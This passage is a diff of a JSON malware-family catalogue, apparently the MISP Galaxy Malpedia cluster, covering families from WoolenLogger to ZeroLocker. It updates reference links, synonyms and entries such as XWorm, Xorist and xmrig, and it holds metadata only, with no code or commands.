"http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf",
- "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf"
+ "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf"
],
"synonyms": [
"WoolenLogger"
@@ -48258,6 +50834,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.worldwind",
+ "https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/",
"https://www.zscaler.com/blogs/security-research/no-honor-among-thieves-prynt-stealers-backdoor-exposed"
],
"synonyms": [],
@@ -48271,8 +50848,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf",
- "https://content.fireeye.com/apt/rpt-apt38"
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf"
],
"synonyms": [],
"type": []
@@ -48328,8 +50905,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.wslink",
"https://twitter.com/darienhuss/status/1453342652682981378",
- "https://www.welivesecurity.com/2021/10/27/wslink-unique-undocumented-malicious-loader-runs-server/",
- "https://www.welivesecurity.com/wp-content/uploads/2022/03/eset_wsliknkvm.pdf"
+ "https://www.welivesecurity.com/wp-content/uploads/2022/03/eset_wsliknkvm.pdf",
+ "https://www.welivesecurity.com/2021/10/27/wslink-unique-undocumented-malicious-loader-runs-server/"
],
"synonyms": [
"FinickyFrogfish"
@@ -48344,7 +50921,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.x4",
- "https://www.gradiant.org/noticia/analysis-malware-cve-2017/"
+ "https://www.gradiant.org/noticia/analysis-malware-cve-2017/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage"
],
"synonyms": [],
"type": []
@@ -48357,21 +50935,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent",
- "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf",
"https://assets.documentcloud.org/documents/3461560/Google-Aquarium-Clean.pdf",
- "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
- "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf",
- "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf",
- "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
- "https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf",
+ "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
+ "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
+ "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
"https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf"
+ "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf",
+ "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight"
],
"synonyms": [
"chopstick",
@@ -48441,9 +51019,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy",
"https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/",
- "https://github.com/eset/malware-ioc/tree/master/xdspy/",
"https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
- "https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf"
+ "https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf",
+ "https://github.com/eset/malware-ioc/tree/master/xdspy/"
],
"synonyms": [],
"type": []
@@ -48451,6 +51029,21 @@
"uuid": "2cf836f5-b88a-417d-b3c6-ab2580fea6ad",
"value": "XDSpy"
},
+ {
+ "description": "XenArmor is a suite of password recovery tools for various applications that have been observed to be abused in attacks alongside malware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xenarmor",
+ "https://xenarmor.com/"
+ ],
+ "synonyms": [
+ "XenArmor Suite"
+ ],
+ "type": []
+ },
+ "uuid": "79fd77ba-4b40-4354-820a-16662edba41d",
+ "value": "XenArmor"
+ },
{
"description": "",
"meta": {
@@ -48469,6 +51062,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xfilesstealer",
+ "https://cyberint.com/blog/research/xfiles-stealer-campaign-abusing-follina/",
"https://twitter.com/3xp0rtblog/status/1473323635469438978"
],
"synonyms": [],
@@ -48482,8 +51076,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xfsadm",
- "https://twitter.com/VK_Intel/status/1149454961740255232",
- "https://twitter.com/r3c0nst/status/1149043362244308992"
+ "https://twitter.com/r3c0nst/status/1149043362244308992",
+ "https://twitter.com/VK_Intel/status/1149454961740255232"
],
"synonyms": [],
"type": []
@@ -48520,6 +51114,32 @@
"uuid": "e839ae61-616c-4234-8edb-36b48040e5af",
"value": "XiaoBa"
},
+ {
+ "description": "According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called \"bundling\".\r\n\r\nIn most cases, \"bundling\" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig",
+ "https://gridinsoft.com/xmrig"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "88efd461-03dd-42eb-976c-5e9fe403fce6",
+ "value": "xmrig"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xorist",
+ "https://www.fortinet.com/blog/threat-research/Ransomware-Roundup-New-Inlock-and-Xorist-Variants"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "029369aa-9e88-4e98-8fda-ca29a873acc5",
+ "value": "Xorist"
+ },
{
"description": "Ransomware.",
"meta": {
@@ -48540,9 +51160,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xpack",
- "https://thehackernews.com/2022/02/chinese-hackers-target-taiwanese.html",
"https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks",
+ "https://thehackernews.com/2022/02/chinese-hackers-target-taiwanese.html"
],
"synonyms": [
"NERAPACK"
@@ -48557,8 +51177,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan",
- "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/",
- "https://securelist.com/blog/research/78110/xpan-i-am-your-father/"
+ "https://securelist.com/blog/research/78110/xpan-i-am-your-father/",
+ "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/"
],
"synonyms": [],
"type": []
@@ -48571,9 +51191,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra",
+ "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis",
"https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
- "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/",
- "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis"
+ "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/"
],
"synonyms": [
"Expectra"
@@ -48588,8 +51208,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat",
- "https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration",
"https://labs.k7computing.com/?p=15672",
+ "https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration",
"https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html"
],
"synonyms": [],
@@ -48632,9 +51252,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf"
+ "https://securelist.com/analysis/publications/69953/the-naikon-apt/"
],
"synonyms": [
"nokian"
@@ -48649,18 +51269,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel",
- "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
- "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf",
- "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government",
- "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/",
"http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf",
+ "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
+ "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
"https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf",
+ "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf"
+ "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government",
+ "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight"
],
"synonyms": [
"Shunnael",
@@ -48698,18 +51318,33 @@
"uuid": "8a57cd75-4572-47c2-b5ef-55df978258de",
"value": "Xwo"
},
+ {
+ "description": "Malware with wide range of capabilities ranging from RAT to ransomware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm",
+ "https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/",
+ "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a5a05a52-5267-4baf-b4a3-366409b46721",
+ "value": "XWorm"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
- "https://jsac.jpcert.or.jp/archive/2019/pdf/JSAC2019_8_nakatsuru_en.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-butler",
- "https://www.macnica.net/mpressioncss/feature_05.html/",
"https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
+ "https://jsac.jpcert.or.jp/archive/2019/pdf/JSAC2019_8_nakatsuru_en.pdf",
+ "https://www.macnica.net/mpressioncss/feature_05.html/",
+ "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
+ "https://www.secureworks.com/research/threat-profiles/bronze-butler",
"https://www.cybereason.com/blog/labs-shadowwali-new-variant-of-the-xxmm-family-of-backdoors",
- "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/"
],
"synonyms": [
"ShadowWalker"
@@ -48731,15 +51366,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "2a16a1d4-a098-4f17-80f3-3cfc6c60b539",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8",
"value": "Yahoyah"
},
@@ -48763,6 +51389,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.yamabot",
+ "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html?m=1",
"https://blogs.jpcert.or.jp/en/2022/07/yamabot.html"
],
@@ -48779,14 +51406,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.yanluowang",
- "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html",
- "https://github.com/albertzsigovits/malware-notes/tree/master/Ransomware-Windows-Yanluowang",
- "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-yanluowang-ransomware-victims/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-targeted-ransomware",
"https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
"https://securelist.com/how-to-recover-files-encrypted-by-yanlouwang/106332/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-targeted-ransomware"
+ "https://github.com/albertzsigovits/malware-notes/tree/master/Ransomware-Windows-Yanluowang",
+ "https://de.darktrace.com/blog/inside-the-yanluowang-leak-organization-members-and-tactics",
+ "https://therecord.media/the-yanluowang-ransomware-group-in-their-own-words/",
+ "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html",
+ "https://twitter.com/CryptoInsane/status/1586967110504398853",
+ "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-yanluowang-ransomware-victims/"
+ ],
+ "synonyms": [
+ "Dryxiphia"
],
- "synonyms": [],
"type": []
},
"uuid": "4bc19ce2-e169-4f9f-aabf-ec7fc6a75d12",
@@ -48883,8 +51515,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.yorekey",
- "https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-threat-insight-paper-triple-threat-N-Korea-aligned-TA406-steals-scams-spies.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/triple-threat-north-korea-aligned-ta406-scams-spies-and-steals"
+ "https://www.proofpoint.com/us/blog/threat-insight/triple-threat-north-korea-aligned-ta406-scams-spies-and-steals",
+ "https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-threat-insight-paper-triple-threat-N-Korea-aligned-TA406-steals-scams-spies.pdf"
],
"synonyms": [],
"type": []
@@ -48929,8 +51561,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ytstealer",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://www.intezer.com/blog/research/ytstealer-malware-youtube-cookies/"
+ "https://www.intezer.com/blog/research/ytstealer-malware-youtube-cookies/",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/"
],
"synonyms": [],
"type": []
@@ -48943,11 +51575,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.yty",
+ "https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/",
+ "https://www.amnesty.org/en/wp-content/uploads/2021/10/AFR5747562021ENGLISH.pdf",
"https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/",
"http://blog.ptsecurity.com/2019/11/studying-donot-team.html",
"https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/",
- "https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/",
- "https://www.amnesty.org/en/wp-content/uploads/2021/10/AFR5747562021ENGLISH.pdf",
"https://www.secureworks.com/research/threat-profiles/zinc-emerson",
"https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/"
],
@@ -49005,52 +51637,45 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy",
- "https://securelist.com/zebrocys-multilanguage-malware-salad/90680/",
- "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/",
- "https://unit42.paloaltonetworks.com/atoms/fighting-ursa/",
- "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://brandefense.io/zebrocy-malware-technical-analysis-report/",
- "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
- "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html",
- "https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g",
+ "https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/",
+ "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html",
+ "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/",
"https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b",
- "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/",
- "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/",
- "https://meltx0r.github.io/tech/2019/10/24/apt28.html",
- "https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
- "https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og",
- "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/",
- "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html",
- "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/",
- "https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware",
"https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
- "https://securelist.com/a-zebrocy-go-downloader/89419/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b",
+ "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/",
"https://research.checkpoint.com/malware-against-the-c-monoculture/",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og",
+ "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/",
+ "https://securelist.com/zebrocys-multilanguage-malware-salad/90680/",
+ "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html",
+ "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
+ "https://meltx0r.github.io/tech/2019/10/24/apt28.html",
+ "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/",
+ "https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/",
"https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/"
+ "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html",
+ "https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/",
+ "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/",
+ "https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/",
+ "https://securelist.com/a-zebrocy-go-downloader/89419/",
+ "https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "https://brandefense.io/zebrocy-malware-technical-analysis-report/",
+ "https://unit42.paloaltonetworks.com/atoms/fighting-ursa/",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf"
],
"synonyms": [
"Zekapab"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "8a2ae47a-c7b2-11e8-b223-ab4d8f78f3ef",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42",
"value": "Zebrocy"
},
@@ -49111,17 +51736,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zeppelin",
- "https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-223a",
- "https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618",
"https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/",
+ "https://community.riskiq.com/article/47766fbd",
+ "https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html",
"https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team___Zeppelin_Ransomware_Analysis.pdf",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/",
"https://www.cisa.gov/uscert/sites/default/files/publications/AA22-223A_Zeppelin_CSA.pdf",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf"
+ "https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-223a",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618"
],
"synonyms": [],
"type": []
@@ -49134,15 +51763,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess",
+ "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/",
+ "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/",
"http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html",
+ "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/",
"https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail",
"http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/",
- "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/",
- "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/",
- "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/",
- "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/",
- "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html",
"https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/",
+ "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html",
+ "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/",
"https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/"
],
"synonyms": [
@@ -49160,25 +51789,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare",
- "https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government",
+ "https://www.ibm.com/downloads/cas/OAJ4VZNJ",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
"https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
"https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://www.ibm.com/downloads/cas/OAJ4VZNJ"
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "40fdcaac-a733-4088-9058-7b15a415b943",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a7e1429f-55bd-41ac-bf45-70c93465d113",
"value": "ZeroCleare"
},
@@ -49208,6 +51829,21 @@
"uuid": "b226e6bb-b8bf-4c5d-b0b3-c7c04d12679a",
"value": "ZeroLocker"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeropadypt",
